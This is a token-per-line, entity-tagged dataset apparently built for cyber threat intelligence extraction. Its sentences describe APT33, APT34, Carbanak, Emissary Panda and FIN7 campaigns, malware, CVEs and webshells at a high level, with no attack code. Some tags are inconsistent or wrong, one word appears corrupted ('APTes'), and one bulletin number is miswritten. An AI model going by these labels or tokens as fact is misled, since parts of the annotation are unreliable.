+relating O
+to O
+the O
+threat O
+actor(s) O
+. O
+Based O
+on O
+this O
+information O
+, O
+it O
+is O
+possible O
+that O
+upon O
+the O
+exposure O
+of O
+the O
+Nasr S-APT
+Institute O
+as O
+a O
+front O
+for O
+Iranian S-LOC
+state-sponsored O
+offensive O
+cyber O
+activity O
+, O
+employees O
+transitioned O
+over O
+to O
+other O
+entities O
+, O
+such O
+as O
+Kavosh O
+, O
+to O
+protect O
+their O
+identities O
+and O
+minimize O
+further O
+exposure O
+. O
+Insikt S-SECTEAM
+Group O
+researchers O
+used O
+proprietary O
+methods O
+, O
+including O
+Recorded O
+Future O
+Domain O
+Analysis O
+and O
+Recorded B-SECTEAM
+Future E-SECTEAM
+Network O
+Traffic O
+Analysis O
+, O
+along O
+with O
+other O
+common O
+analytical O
+approaches O
+, O
+to O
+profile O
+recently O
+reported O
+Iranian O
+threat O
+actor O
+APT33’s S-APT
+domain O
+and O
+hosting O
+infrastructure O
+in O
+an O
+effort O
+to O
+identify O
+recent O
+activity O
+. O
+Insikt S-SECTEAM
+Group O
+enumerated O
+all O
+domains O
+reported O
+as O
+being O
+used O
+by O
+APT33 S-APT
+since O
+January B-TIME
+2019 E-TIME
+. O
+PlugX S-FILE
+is O
+a O
+modular O
+structured O
+malware O
+that O
+has O
+many O
+different O
+operational O
+plugins O
+such O
+as O
+communication O
+compression O
+and O
+encryption O
+, O
+network O
+enumeration O
+, O
+files O
+interaction O
+, O
+remote O
+shell O
+operations O
+and O
+more O
+. O
+Using O
+data O
+from O
+Recorded B-SECTEAM
+Future E-SECTEAM
+Domain O
+Analysis O
+and O
+combining O
+it O
+with O
+data O
+derived O
+from O
+Recorded O
+Future O
+Network O
+Traffic O
+Analysis O
+, O
+Insikt B-SECTEAM
+Group E-SECTEAM
+researchers O
+were O
+able O
+to O
+identify O
+a O
+small O
+selection O
+of O
+likely O
+targeted O
+organizations O
+impacted O
+by O
+suspected O
+APT33 S-APT
+activity O
+. O
+Following O
+the O
+exposure O
+of O
+a O
+wide O
+range O
+of O
+their O
+infrastructure O
+and O
+operations O
+by O
+Symantec S-SECTEAM
+earlier O
+this O
+year O
+, O
+we O
+discovered O
+that O
+APT33 S-APT
+, O
+or O
+closely O
+aligned O
+actors O
+, O
+reacted O
+by O
+either O
+parking O
+or O
+reassigning O
+some O
+of O
+their O
+domain O
+infrastructure O
+. O
+Since O
+late B-TIME
+March E-TIME
+, O
+suspected O
+APT33 S-APT
+threat O
+actors O
+have O
+continued O
+to O
+use O
+a O
+large O
+swath O
+of O
+operational O
+infrastructure O
+, O
+well O
+in O
+excess O
+of O
+1 O
+, O
+200 O
+domains O
+, O
+with O
+many O
+observed O
+communicating O
+with O
+19 O
+different O
+commodity O
+RAT S-MAL
+implants O
+. O
+While O
+we O
+haven’t O
+observed O
+a O
+widespread O
+targeting O
+of O
+commercial O
+entities O
+or O
+regional O
+adversaries O
+like O
+in O
+previously O
+documented O
+APT33 S-APT
+operations O
+, O
+the O
+handful O
+of O
+targeted O
+organizations O
+that O
+we O
+did O
+observe O
+were O
+mainly O
+located O
+in O
+Saudi B-LOC
+Arabia E-LOC
+across O
+a O
+range O
+of O
+industries O
+, O
+indicating O
+ongoing O
+targeting O
+aligned O
+with O
+geopolitical O
+aims O
+. O
+The O
+zip O
+contained O
+a O
+sample O
+of O
+the O
+Poison B-MAL
+Ivy E-MAL
+malware O
+which O
+is O
+also O
+known O
+to O
+be O
+used O
+by O
+APT10 S-APT
+. O
+The O
+new O
+malware O
+families O
+, O
+which O
+we O
+will O
+examine O
+later O
+in O
+this O
+post O
+, O
+show O
+APT34 S-APT
+relying O
+on O
+their O
+PowerShell S-MAL
+development O
+capabilities O
+, O
+as O
+well O
+as O
+trying O
+their O
+hand O
+at O
+Golang O
+. O
+Additionally O
+, O
+with O
+the O
+assistance O
+of O
+our O
+FireEye S-SECTEAM
+Labs O
+Advanced O
+Reverse O
+Engineering O
+(FLARE) O
+, O
+Intelligence O
+, O
+and O
+Advanced B-SECTEAM
+Practices E-SECTEAM
+teams O
+, O
+we O
+identified O
+three O
+new O
+malware O
+families O
+and O
+a O
+reappearance O
+of O
+PICKPOCKET O
+, O
+malware O
+exclusively O
+observed O
+in O
+use O
+by O
+APT34 S-MAL
+. O
+This O
+threat O
+group O
+has O
+conducted O
+broad O
+targeting O
+across O
+a O
+variety O
+of O
+industries O
+operating O
+in O
+the O
+Middle S-LOC
+East; S-LOC
+however O
+, O
+we O
+believe O
+APT34's O
+strongest O
+interest O
+is O
+gaining O
+access O
+to O
+financial S-IDTY
+, O
+energy S-IDTY
+, O
+and O
+government S-IDTY
+entities O
+. O
+Additionally O
+, O
+with O
+the O
+assistance O
+of O
+FireEye B-SECTEAM
+Labs E-SECTEAM
+, O
+we O
+identified O
+three O
+new O
+malware O
+families O
+and O
+a O
+reappearance O
+of O
+PICKPOCKET S-MAL
+, O
+malware O
+exclusively O
+observed O
+in O
+use O
+by O
+APT34 S-APT
+. O
+APT34 S-APT
+is O
+an O
+Iran-nexus O
+cluster O
+of O
+cyber O
+espionage B-ACT
+activity E-ACT
+that O
+has O
+been O
+active O
+since O
+at O
+least O
+2014 S-TIME
+. O
+This O
+CPE O
+was O
+created O
+to O
+ensure O
+our O
+customers O
+are O
+updated O
+with O
+new O
+discoveries O
+, O
+activity O
+and O
+detection O
+efforts O
+related O
+to O
+this O
+campaign O
+, O
+along O
+with O
+other O
+recent O
+activity O
+from O
+Iranian-nexus S-LOC
+threat O
+actors O
+to O
+include O
+APT33 S-APT
+, O
+which O
+is O
+mentioned O
+in O
+this O
+updated O
+FireEye S-SECTEAM
+blog O
+post O
+. O
+On O
+June B-TIME
+19 E-TIME
+, O
+2019 S-TIME
+, O
+FireEye’s S-SECTEAM
+Managed O
+Defense O
+Security O
+Operations O
+Center O
+received O
+an O
+exploit S-VULNAME
+detection O
+alert O
+on O
+one O
+of O
+our O
+FireEye S-SECTEAM
+Endpoint O
+Security O
+appliances O
+. O
+A O
+backdoor O
+that O
+communicates O
+with O
+a O
+single O
+command O
+and O
+control O
+server O
+using O
+HTTP S-PROT
+GET O
+and O
+POST O
+requests O
+, O
+TONEDEAF S-FILE
+supports O
+collecting O
+system O
+information O
+, O
+uploading O
+and O
+downloading O
+of O
+files O
+, O
+and O
+arbitrary O
+shell O
+command O
+execution O
+. O
+FireEye’s S-SECTEAM
+Advanced O
+Practices O
+and O
+Intelligence O
+teams O
+were O
+able O
+to O
+identify O
+additional O
+artifacts O
+and O
+activity O
+from O
+the O
+APT34 S-APT
+actors O
+at O
+other O
+victim B-IDTY
+organizations E-IDTY
+. O
+Of O
+note O
+, O
+FireEye S-SECTEAM
+discovered O
+two O
+additional O
+new O
+malware O
+families O
+hosted O
+at O
+this O
+domain O
+, O
+VALUEVAULT S-FILE
+and O
+LONGWATCH S-FILE
+. O
+This O
+tool S-MAL
+was O
+previously O
+observed O
+during O
+a O
+Mandiant S-ACT
+incident O
+response O
+in O
+2018 S-TIME
+and O
+, O
+to O
+date O
+, O
+solely O
+utilized O
+by O
+APT34 S-APT
+. O
+PICKPOCKET S-FILE
+is O
+a O
+credential O
+theft O
+tool O
+that O
+dumps O
+the O
+user's O
+website O
+login O
+credentials O
+from O
+Chrome O
+, O
+Firefox O
+, O
+and O
+Internet O
+Explorer O
+to O
+a O
+file O
+. O
+FireEye S-SECTEAM
+detects O
+this O
+activity O
+across O
+our O
+platforms O
+, O
+including O
+named O
+detection O
+for O
+TONEDEAF S-FILE
+, O
+VALUEVAULT S-FILE
+, O
+and O
+LONGWATCH S-FILE
+. O
+Several O
+spear-phishing S-ACT
+campaigns O
+attributed O
+to O
+Carbanak S-APT
+, O
+all O
+occurring O
+between O
+March S-TIME
+and O
+May B-TIME
+2018 E-TIME
+, O
+were O
+analyzed O
+by O
+security O
+researchers O
+in O
+2018 S-TIME
+. O
+One O
+of O
+the O
+most O
+prolific O
+APT-style O
+cyberattacks O
+, O
+specifically O
+targeting O
+the O
+financial S-IDTY
+sector O
+, O
+is O
+known O
+as O
+Carbanak S-APT
+. O
+Discovered O
+in O
+2014 S-TIME
+, O
+the O
+campaign O
+quickly O
+gained O
+notoriety O
+after O
+compromising O
+the O
+security O
+systems O
+of O
+100 O
+banks S-IDTY
+in O
+40 O
+countries O
+and O
+stealing O
+up O
+to O
+$1 O
+billion O
+in O
+the O
+process O
+. O
+The O
+same O
+group O
+is O
+believed O
+to O
+have O
+also O
+been O
+using O
+the O
+Cobalt O
+Strike O
+framework S-MAL
+to O
+run O
+sophisticated B-ACT
+campaigns E-ACT
+, O
+plotting O
+and O
+performing O
+financial S-IDTY
+heists O
+of O
+financial O
+institutions O
+. O
+Banks S-IDTY
+in O
+countries O
+such O
+as O
+Russia S-LOC
+, O
+the O
+United B-LOC
+Kingdom E-LOC
+, O
+the O
+Netherlands S-LOC
+, O
+Spain S-LOC
+, O
+Romania S-LOC
+, O
+Belarus S-LOC
+, O
+Poland S-LOC
+, O
+Estonia S-LOC
+, O
+Bulgaria S-LOC
+, O
+Georgia S-LOC
+, O
+Moldova S-LOC
+, O
+Kyrgyzstan S-LOC
+, O
+Armenia S-LOC
+, O
+Taiwan S-LOC
+and O
+Malaysia S-LOC
+have O
+allegedly O
+been O
+targeted O
+with O
+spearphishing B-FILE
+emails E-FILE
+, O
+luring O
+victims O
+into O
+clicking O
+malicious O
+URLs O
+and O
+executing O
+booby-trapped O
+documents O
+. O
+A O
+Carbanak S-APT
+trademark O
+in O
+cyberattacks O
+remains O
+the O
+use O
+of O
+Cobalt B-MAL
+Strike E-MAL
+– O
+a O
+powerful O
+pentesting O
+tool O
+designed O
+for O
+exploiting O
+and O
+executing O
+malicious O
+code O
+, O
+simulating O
+post-exploitation O
+actions O
+of O
+advanced O
+threat O
+actors O
+– O
+which O
+allows O
+them O
+to O
+infiltrate O
+the O
+organization O
+, O
+move O
+laterally O
+, O
+exfiltrate B-ACT
+data E-ACT
+, O
+and O
+deploy S-ACT
+anti-forensic O
+and O
+evasion O
+tools O
+. O
+However O
+, O
+this O
+action O
+doesn’t O
+appear O
+to O
+have O
+made O
+a O
+dent O
+in O
+the O
+cybercriminal O
+organization O
+, O
+as O
+subsequent O
+spear-phishing S-ACT
+campaigns O
+seem O
+to O
+have O
+been O
+reported O
+from O
+March S-TIME
+until O
+May B-TIME
+2018 E-TIME
+. O
+Bitdefender’s S-APT
+forensics O
+and O
+investigation O
+team O
+was O
+contacted O
+to O
+look O
+into O
+a O
+security O
+incident O
+that O
+started O
+in O
+May B-TIME
+2018 E-TIME
+with O
+an O
+email S-TOOL
+received O
+by O
+two O
+of O
+the O
+bank’s S-IDTY
+employees O
+. O
+The O
+Carbanak S-APT
+group O
+, O
+which O
+has O
+a O
+long O
+track O
+record O
+of O
+compromising O
+infrastructure O
+belonging O
+to O
+financial S-IDTY
+institutions O
+, O
+is O
+still O
+active O
+. O
+Its S-APT
+purpose O
+remains O
+to O
+manipulate O
+financial S-ACT
+assets O
+, O
+such O
+as O
+transferring O
+funds O
+from O
+bank S-IDTY
+accounts O
+or O
+taking O
+over O
+ATM O
+infrastructures O
+and O
+instructing O
+them O
+to O
+dispense O
+cash O
+at O
+predetermined O
+time O
+intervals O
+. O
+If O
+the O
+attack O
+had O
+succeeded O
+, O
+it O
+would O
+have O
+given O
+hackers O
+control O
+over O
+the O
+ATM O
+network O
+, O
+while O
+money O
+mules O
+would O
+have O
+been O
+standing O
+by O
+the O
+ATM O
+machines O
+at O
+pre-set O
+time O
+intervals O
+to O
+cash O
+them O
+out O
+. O
+The O
+actors S-APT
+uploaded O
+a O
+variety O
+of O
+tools O
+that O
+they O
+used O
+to O
+perform O
+additional O
+activities O
+on O
+the O
+compromised O
+network O
+, O
+such O
+as O
+dumping B-MAL
+credentials E-MAL
+, O
+as O
+well O
+as O
+locating S-ACT
+and O
+pivoting S-ACT
+to O
+additional O
+systems O
+on O
+the O
+network O
+. O
+We O
+believe O
+Emissary B-APT
+Panda E-APT
+exploited O
+a O
+recently O
+patched O
+vulnerability S-VULNAME
+in O
+Microsoft S-IDTY
+SharePoint O
+tracked O
+by O
+CVE-2019-0604 S-VULID
+, O
+which O
+is O
+a O
+remote O
+code O
+execution O
+vulnerability O
+used O
+to O
+compromise O
+the O
+server O
+and O
+eventually O
+install O
+a O
+webshell O
+. O
+Bitdefender’s S-APT
+investigation O
+shows O
+the O
+attackers’ O
+main O
+methods O
+remain O
+to O
+quietly O
+infiltrate O
+the O
+infrastructure O
+by O
+establishing S-ACT
+a O
+foothold O
+on O
+an O
+employee’s O
+system O
+, O
+then O
+move O
+laterally O
+across O
+the O
+infrastructure O
+or O
+elevate O
+privileges O
+to O
+find O
+critical O
+systems O
+that O
+manage O
+financial B-IDTY
+transactions E-IDTY
+or O
+ATM B-IDTY
+networks E-IDTY
+. O
+We O
+also O
+found O
+the O
+China B-MAL
+Chopper I-MAL
+webshell E-MAL
+on O
+the O
+SharePoint O
+servers O
+, O
+which O
+has O
+also O
+been O
+used O
+by O
+the O
+Emissary B-APT
+Panda E-APT
+threat O
+group O
+. O
+Of O
+particular O
+note O
+is O
+their O
+use O
+of O
+tools O
+to O
+identify O
+systems O
+vulnerable O
+to O
+CVE-2017-0144 S-VULID
+, O
+which O
+is O
+the O
+same O
+vulnerability O
+exploited O
+by O
+EternalBlue S-ACT
+that O
+is O
+best O
+known O
+for O
+its O
+use O
+in O
+the O
+WannaCry B-ACT
+attacks E-ACT
+of O
+2017 S-TIME
+. O
+In O
+addition O
+to O
+the O
+aforementioned O
+post-exploitation O
+tools O
+, O
+the O
+actors O
+used O
+these O
+webshells S-TOOL
+to O
+upload O
+legitimate O
+executables O
+that O
+they O
+would O
+use O
+DLL S-TOOL
+sideloading O
+to O
+run B-ACT
+a I-ACT
+malicious I-ACT
+DLL E-ACT
+that O
+has O
+code O
+overlaps O
+with O
+known O
+Emissary B-APT
+Panda E-APT
+attacks O
+. O
+This O
+webshell B-ACT
+activity E-ACT
+took O
+place O
+across O
+three O
+SharePoint O
+servers O
+hosted O
+by O
+two O
+different O
+government O
+organizations O
+between O
+April B-TIME
+1 E-TIME
+, O
+2019 S-TIME
+and O
+April B-TIME
+16 E-TIME
+, O
+2019 S-TIME
+, O
+where O
+actors O
+uploaded O
+a O
+total O
+of O
+24 O
+unique O
+executables O
+across O
+the O
+three O
+SharePoint O
+servers O
+. O
+The O
+timeline O
+shows O
+three O
+main O
+clusters O
+of O
+activity O
+across O
+the O
+three O
+webshells S-TOOL
+, O
+with O
+activity O
+occurring O
+on O
+two O
+separate O
+webshells S-TOOL
+within O
+a O
+very O
+small O
+window O
+of O
+time O
+on O
+April B-TIME
+2 E-TIME
+, O
+2019 S-TIME
+and O
+the O
+activity O
+involving O
+the O
+third O
+webshell O
+two O
+weeks O
+later O
+on O
+April B-TIME
+16 E-TIME
+, O
+2019 S-TIME
+. O
+In O
+April B-TIME
+2019 E-TIME
+, O
+several O
+national O
+security O
+organizations O
+released O
+alerts O
+on O
+CVE-2019-0604 S-VULID
+exploitation O
+, O
+including O
+the O
+Saudi B-LOC
+Arabian E-LOC
+National O
+Cyber B-SECTEAM
+Security I-SECTEAM
+Center E-SECTEAM
+and O
+the O
+Canadian B-SECTEAM
+Center E-SECTEAM
+for O
+Cyber O
+Security O
+. O
+Based O
+on O
+the O
+functionality O
+of O
+the O
+various O
+tools O
+uploaded O
+to O
+the O
+webshells S-TOOL
+, O
+we O
+believe O
+the O
+threat O
+actors S-APT
+breach O
+the O
+SharePoint O
+servers O
+to O
+use O
+as O
+a O
+beachhead O
+, O
+then O
+attempt O
+to O
+move O
+laterally O
+across O
+the O
+network O
+via O
+stolen O
+credentials O
+and O
+exploiting O
+vulnerabilities O
+. O
+We O
+also O
+observed O
+the O
+actors S-APT
+uploading O
+custom O
+backdoors O
+such O
+as O
+HyperBro S-MAL
+which O
+is O
+commonly O
+associated O
+with O
+Emissary B-APT
+Panda E-APT
+. O
+Both O
+of O
+these O
+alerts O
+discussed O
+campaigns O
+in O
+which O
+actors S-APT
+used O
+the O
+CVE-2019-0604 S-VULID
+to O
+exploit S-VULNAME
+SharePoint O
+servers O
+to O
+install O
+the O
+China B-MAL
+Chopper I-MAL
+webshell E-MAL
+. O
+During O
+our O
+research O
+into O
+this O
+attack O
+campaign O
+, O
+Unit B-SECTEAM
+42 E-SECTEAM
+gathered O
+several O
+tools O
+that O
+the O
+Emissary B-APT
+Panda E-APT
+uploaded O
+to O
+the O
+three O
+webshells S-TOOL
+at O
+the O
+two O
+government B-IDTY
+organizations E-IDTY
+. O
+We O
+also O
+observed O
+the O
+actors S-APT
+uploading O
+the O
+HyperBro B-MAL
+backdoor E-MAL
+to O
+one O
+of O
+the O
+webshells S-TOOL
+, O
+as O
+well O
+as O
+legitimate O
+executables O
+that O
+would O
+sideload B-ACT
+malicious E-ACT
+DLLs S-ACT
+that O
+have O
+overlapping O
+code O
+associated O
+with O
+known O
+Emissary B-APT
+Panda E-APT
+activity O
+. O
+Lastly O
+, O
+we O
+saw O
+the O
+actor S-APT
+uploading O
+a O
+custom O
+backdoor O
+called O
+HyperBro S-MAL
+, O
+which O
+has O
+been O
+associated O
+with O
+Emissary B-APT
+Panda E-APT
+operations O
+in O
+the O
+past O
+. O
+The O
+other O
+overlapping O
+files O
+are O
+tools O
+used O
+by O
+the O
+adversary O
+to O
+locate O
+other O
+systems O
+on O
+the O
+network O
+( O
+etool.exe S-FILE
+) O
+, O
+check O
+to O
+see O
+if O
+they O
+are O
+vulnerable O
+to O
+CVE-2017-0144 S-VULID
+( O
+EternalBlue S-VULNAME
+) O
+patched O
+in O
+MS07-010 S-FILE
+(checker1.exe) O
+and O
+pivot O
+to O
+them O
+using O
+remote O
+execution O
+functionality O
+offered O
+by O
+a O
+tool O
+similar O
+to O
+PsExec S-TOOL
+offered O
+by O
+Impacket S-TOOL
+( O
+psexec.exe S-FILE
+) O
+. O
+Also O
+, O
+the O
+NCSC O
+advisory O
+mentioned O
+that O
+the O
+actors O
+used O
+a O
+file O
+name O
+stylecss.aspx S-FILE
+for O
+their O
+webshell O
+, O
+which O
+is O
+the O
+same O
+filename O
+we O
+saw O
+associated O
+with O
+China B-FILE
+Chopper E-FILE
+. O
+we O
+will O
+provide O
+an O
+analysis O
+of O
+the O
+HyperBro S-FILE
+tool O
+in O
+an O
+upcoming O
+section O
+. O
+However O
+, O
+using O
+NCC S-SECTEAM
+Group’s O
+research O
+published O
+in O
+May O
+2018 S-TIME
+, O
+we O
+were O
+able O
+to O
+discover O
+code O
+overlaps O
+between O
+these O
+DLLs O
+and O
+a O
+sideloaded O
+DLL S-TOOL
+that O
+ran O
+the O
+SysUpdate O
+tool O
+that O
+the O
+NCC S-SECTEAM
+group O
+has O
+associated O
+with O
+an O
+Emissary B-APT
+Panda E-APT
+campaign O
+. O
+The O
+list O
+also O
+includes O
+several O
+hack B-MAL
+tools E-MAL
+, O
+such O
+as O
+Mimikatz S-MAL
+for O
+credential O
+dumping O
+and O
+several O
+compiled O
+python B-MAL
+scripts E-MAL
+used O
+to O
+locate O
+and O
+compromise O
+other O
+systems O
+on O
+the O
+local O
+network O
+. O
+Unfortunately O
+, O
+we O
+do O
+not O
+have O
+access O
+to O
+the O
+PYTHON33.hlp O
+or O
+CreateTsMediaAdm.hlp O
+files O
+, O
+so O
+we O
+do O
+not O
+know O
+the O
+final O
+payload O
+loaded O
+by O
+either O
+of O
+these O
+DLLs O
+. O
+Figure O
+9 O
+shows O
+a O
+code O
+comparison O
+between O
+the O
+PYTHON33.dll S-FILE
+(right) O
+and O
+inicore_v2.3.30.dll S-FILE
+(left) O
+(SHA256: O
+4d65d371a789aabe1beadcc10b38da1f998cd3ec87d4cc1cfbf0af014b783822 S-SHA2
+) O
+, O
+which O
+was O
+sideloaded O
+to O
+run O
+the O
+SysUpdate S-MAL
+tool O
+in O
+a O
+previous O
+Emissary B-APT
+Panda E-APT
+campaign O
+. O
+
+The O
+Emissary B-APT
+Panda E-APT
+threat O
+group O
+loaded O
+the O
+China B-MAL
+Chopper E-MAL
+webshell O
+onto O
+SharePoint O
+servers O
+at O
+two O
+Government O
+organizations O
+in O
+the O
+Middle B-LOC
+East E-LOC
+, O
+which O
+we O
+believe O
+with O
+high O
+confidence O
+involved O
+exploiting O
+a O
+remote O
+code O
+execution O
+vulnerability O
+in O
+SharePoint O
+tracked O
+in O
+CVE-2019-0604 S-VULID
+. O
+The O
+files O
+uploaded O
+to O
+this O
+webshell O
+included O
+the O
+same O
+compiled O
+python B-MAL
+script E-MAL
+that O
+would O
+scan O
+remote O
+systems O
+that O
+were O
+vulnerable O
+to O
+CVE-2017-0144 S-VULID
+( O
+EternalBlue S-VULNAME
+) O
+that O
+we O
+saw O
+uploaded O
+to O
+the O
+other O
+errr.aspx S-FILE
+webshell O
+. O
+According O
+to O
+Microsoft’s S-SECTEAM
+advisory O
+, O
+this O
+vulnerability O
+was O
+patched O
+on O
+March B-TIME
+12 E-TIME
+, O
+2019 S-TIME
+and O
+we O
+first O
+saw O
+the O
+webshell O
+activity O
+on O
+April B-TIME
+1 E-TIME
+, O
+2019 S-TIME
+. O
+We O
+believe O
+the O
+actors S-APT
+pivoted O
+to O
+other O
+systems O
+on O
+the O
+network O
+using O
+stolen B-ACT
+credentials E-ACT
+and O
+by O
+exploiting O
+the O
+CVE-2017-0144 S-VULID
+( O
+EternalBlue S-VULNAME
+) O
+vulnerability O
+patched O
+in O
+MS17-010 S-FILE
+. O
+Once O
+the O
+adversary O
+established O
+a O
+foothold O
+on O
+the O
+targeted O
+network O
+, O
+they S-APT
+used O
+China B-MAL
+Chopper E-MAL
+and O
+other O
+webshells S-TOOL
+to O
+upload O
+additional O
+tools O
+to O
+the O
+SharePoint O
+server O
+to O
+dump B-ACT
+credentials E-ACT
+, O
+perform O
+network O
+reconnaissance O
+and O
+pivot O
+to O
+other O
+systems O
+. O
+We O
+also O
+observed O
+Emissary B-APT
+Panda E-APT
+uploading O
+legitimate O
+tools O
+that O
+would O
+sideload B-ACT
+DLLs E-ACT
+, O
+specifically O
+the O
+Sublime O
+Text O
+plugin O
+host O
+and O
+the O
+Microsoft’s O
+Create O
+Media O
+application O
+, O
+both O
+of O
+which O
+we O
+had O
+never O
+seen O
+used O
+for O
+DLL B-ACT
+sideloading E-ACT
+before O
+. O
+Consequently O
+, O
+the O
+Linux S-OS
+malware O
+ecosystem O
+is O
+plagued O
+by O
+financial S-IDTY
+driven O
+crypto-miners O
+and O
+DDoS O
+botnet O
+tools O
+which O
+mostly O
+target O
+vulnerable B-IDTY
+servers E-IDTY
+. O
+We O
+also O
+observed O
+the O
+actors S-APT
+uploading O
+legitimate O
+tools O
+that O
+would O
+sideload B-ACT
+DLLs E-ACT
+, O
+specifically O
+the O
+Sublime B-MAL
+Text E-MAL
+plugin O
+host O
+and O
+the O
+Microsoft’s O
+Create O
+Media B-MAL
+application E-MAL
+, O
+both O
+of O
+which O
+we O
+had O
+never O
+seen O
+used O
+for O
+DLL S-TOOL
+sideloading O
+before O
+. O
+It S-APT
+has O
+been O
+active O
+since O
+at O
+least O
+2013 S-TIME
+, O
+and O
+has O
+targeted O
+individuals O
+likely O
+involved O
+with O
+the O
+Ukrainian S-LOC
+government O
+. O
+The O
+group’s S-APT
+implants O
+are O
+characterized O
+by O
+the O
+employment O
+of O
+information O
+stealing B-MAL
+tools E-MAL
+among O
+them O
+being O
+screenshot O
+and O
+document B-MAL
+stealers E-MAL
+delivered O
+via O
+a O
+SFX O
+, O
+and O
+made O
+to O
+achieve O
+persistence O
+through O
+a O
+scheduled O
+task O
+. O
+The O
+finding O
+shows O
+that O
+EvilGnome S-MAL
+operates O
+on O
+an O
+IP S-PROT
+address O
+that O
+was O
+controlled O
+by O
+the O
+Gamaredon B-APT
+group E-APT
+two O
+months O
+ago O
+. O
+FIN7 S-APT
+operations O
+are O
+linked O
+to O
+numerous O
+intrusion O
+attempts O
+having O
+targeted O
+hundreds O
+of O
+companies O
+since O
+at O
+least O
+as O
+early O
+as O
+2015 S-TIME
+. O
+The O
+FIN7 S-APT
+intrusion O
+set O
+continued O
+its O
+tailored O
+spear B-ACT
+phishing E-ACT
+campaigns O
+throughout O
+last B-TIME
+year E-TIME
+. O
+In O
+addition O
+, O
+during O
+the O
+investigation O
+, O
+we O
+discovered O
+certain O
+similarities O
+to O
+other O
+attacker B-APT
+groups E-APT
+that O
+seemed O
+to O
+share O
+or O
+copy O
+the O
+FIN7 S-APT
+TTPs O
+in O
+their O
+own O
+operations O
+. O
+In O
+2018-2019 S-TIME
+, O
+researchers O
+of O
+Kaspersky S-SECTEAM
+Lab’s B-SECTEAM
+Global I-SECTEAM
+Research I-SECTEAM
+and I-SECTEAM
+Analysis I-SECTEAM
+Team E-SECTEAM
+analyzed O
+various B-ACT
+campaigns E-ACT
+that O
+used O
+the O
+same O
+Tactics O
+Tools O
+and O
+Procedures O
+(TTPs) O
+as O
+the O
+historic O
+FIN7 S-APT
+, O
+leading O
+the O
+researchers O
+to O
+believe O
+that O
+this O
+threat O
+actor O
+had O
+remained O
+active O
+despite O
+the O
+2018 S-TIME
+arrests O
+. O
+One O
+of O
+the O
+domains O
+used O
+by O
+FIN7 S-APT
+in O
+their O
+2018 S-TIME
+campaign O
+of O
+spear B-ACT
+phishing E-ACT
+contained O
+more O
+than O
+130 O
+email S-TOOL
+APTes O
+, O
+leading O
+us O
+to O
+think O
+that O
+more O
+than O
+130 O
+companies O
+had O
+been O
+targeted O
+by O
+the O
+end O
+of O
+2018 S-TIME
+. O
+Interestingly O
+, O
+following O
+some O
+open-source O
+publications O
+about O
+them O
+, O
+the O
+FIN7 S-APT
+operators O
+seems O
+to O
+have O
+developed O
+a O
+homemade O
+builder O
+of O
+malicious B-MAL
+Office I-MAL
+document E-MAL
+using O
+ideas O
+from O
+ThreadKit O
+, O
+which O
+they O
+employed O
+during O
+the O
+summer O
+of O
+2018 S-TIME
+. O
+The O
+first O
+module O
+downloaded O
+by O
+the O
+GRIFFON S-FILE
+malware O
+to O
+the O
+victim’s O
+computer O
+is O
+an O
+information-gathering O
+JScript O
+, O
+which O
+allows O
+the O
+cybercriminals O
+to O
+understand O
+the O
+context O
+of O
+the O
+infected O
+workstation O
+. O
+The O
+new O
+GRIFFON S-FILE
+implant O
+is O
+written O
+to O
+the O
+hard O
+drive O
+before O
+each O
+execution O
+, O
+limiting O
+the O
+file-less” O
+aspect O
+of O
+this O
+method O
+. O
+Given O
+FIN7’s S-APT
+previous O
+use O
+of O
+false O
+security B-IDTY
+companies E-IDTY
+, O
+we O
+decided O
+to O
+look O
+deeper O
+into O
+this O
+one O
+. O
+This O
+activity B-APT
+cluster E-APT
+, O
+which O
+Kaspersky S-SECTEAM
+Lab O
+has O
+followed O
+for O
+a O
+few O
+years O
+, O
+uses O
+various O
+implants O
+for O
+targeting O
+mainly O
+banks S-IDTY
+, O
+and O
+developers O
+of O
+banking O
+and O
+money B-IDTY
+processing E-IDTY
+software O
+solutions O
+. O
+FIN7’s S-APT
+last O
+campaigns O
+were O
+targeting O
+banks S-IDTY
+in O
+Europe S-LOC
+and O
+Central B-LOC
+America E-LOC
+. O
+After O
+a O
+successful O
+penetration O
+, O
+FIN7 S-APT
+uses O
+its O
+own O
+backdoors S-MAL
+and O
+the O
+CobaltStrike B-MAL
+framework E-MAL
+or O
+Powershell S-MAL
+Empire O
+components O
+to O
+hop O
+to O
+interesting O
+parts O
+of O
+the O
+network O
+, O
+where O
+it O
+can O
+monetize O
+its O
+access O
+. O
+AveMaria S-APT
+is O
+a O
+new O
+botnet O
+, O
+whose O
+first O
+version O
+we O
+found O
+in O
+September B-TIME
+2018 E-TIME
+, O
+right O
+after O
+the O
+arrests O
+of O
+the O
+FIN7 S-APT
+members O
+. O
+This O
+threat O
+actor O
+stole O
+suspected O
+of O
+stealing O
+€13 O
+million O
+from O
+Bank S-IDTY
+of O
+Valetta O
+, O
+Malta O
+earlier O
+this B-TIME
+year E-TIME
+. O
+In O
+fact O
+, O
+AveMaria S-FILE
+is O
+a O
+classic O
+infostealer O
+bot O
+that O
+collects O
+all O
+possible O
+credentials O
+from O
+various O
+types O
+of O
+software: O
+browsers O
+, O
+email S-TOOL
+clients O
+, O
+messengers O
+, O
+etc. O
+, O
+and O
+can O
+act O
+as O
+a O
+keylogger O
+. O
+They S-APT
+also O
+use O
+AutoIT B-MAL
+droppers E-MAL
+, O
+password-protected O
+EXE O
+files O
+and O
+even O
+ISO O
+images O
+. O
+To O
+deliver O
+their O
+malware O
+, O
+the O
+cyber B-APT
+criminals E-APT
+use O
+spearphishing B-MAL
+emails E-MAL
+with O
+various O
+types O
+of O
+attachments: S-MAL
+MS O
+Office O
+documents S-MAL
+or O
+spreadsheet O
+files O
+exploiting O
+some O
+known O
+vulnerability O
+like O
+CVE-2017-11882 S-VULID
+, O
+or O
+documents S-MAL
+with O
+Ole2Link O
+and O
+SCT O
+. O
+Interestingly O
+, O
+this O
+actor S-APT
+targeted O
+financial S-IDTY
+entities O
+and O
+companies O
+in O
+one O
+African S-LOC
+country O
+, O
+which O
+lead O
+us O
+to O
+think O
+that O
+CopyPaste O
+was O
+associated O
+with O
+cybermercenaries O
+or O
+a O
+training O
+center O
+. O
+At O
+the O
+end B-TIME
+of I-TIME
+2018 E-TIME
+, O
+while O
+searching O
+for O
+new O
+FIN7 S-APT
+campaigns O
+via O
+telemetry O
+, O
+we O
+discovered O
+a O
+set O
+of O
+activity O
+that O
+we O
+temporarily O
+called O
+CopyPaste” S-ACT
+from O
+a O
+previously O
+unknown O
+APT O
+. O
+FIN7 S-APT
+and O
+Cobalt S-APT
+used O
+decoy S-ACT
+302 O
+HTTP S-PROT
+redirections O
+too O
